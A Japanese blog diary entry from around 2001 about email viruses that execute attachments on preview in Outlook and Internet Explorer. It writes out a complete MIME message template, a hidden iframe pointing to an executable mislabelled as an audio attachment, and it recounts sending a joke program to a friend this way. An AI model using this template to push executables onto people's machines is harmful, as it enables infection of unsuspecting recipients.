11/27(火)
★ウィルス
最近、また、ウィルスがガンガン来出した。昨日あたりから、また、新しいウイルスが来るようになった。これが、なんと、昨日の時点では、まだウィルスチェッカーには引っかからなかったのだ。ウィルスチェックのパターファイルが出来るより前にウィルスを受け取ってしまうとは、なんて恐ろしい世の中だ。しかも、これはすごいことに、Outlookやなんかで見ると、というか、見ようとするだけで、ウィルスファイルを実行しようとするのだ。うちでやってみると、メールをクリックするだけで、「保存する」か「実行する」かを尋ねるダイアログが出た。 IEのバージョンが古かったりすると、ダイアログも出ずに、知らないうちに実行されてしまうのだろう。

ちなみに、ヘッダに、

Content-Type: multipart/related;
	 type="multipart/alternative";
	 boundary="====_ABC1234567890DEF_===="

という風にしておいて、本文を、

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
	 boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
 	 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
	 name="添付ファイル名"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

ここにBASE64エンコードした添付ファイル

--====_ABC1234567890DEF_====

--====_ABC1234567890DEF_====--

というふうにすれば、簡単に再現できた。友達に、みかん星人を送りつけてみたところ、ダイアログが突然出て実行にすると、みかん星人が現れたらしい。

悪用しないように。

・えーなにそれ！こわー、さっそくパッチをとりにいきまいした。 [2001/11/29 13:22:16] (by ぷらちなぼんさら)
・この穴自体はだいぶ前からあったんだろうけど、問題は、よく来るということ。かなり感染してるんでしょうなぁ。 [2001/11/29 22:03:10] (by ひらちゃん)
# 戻る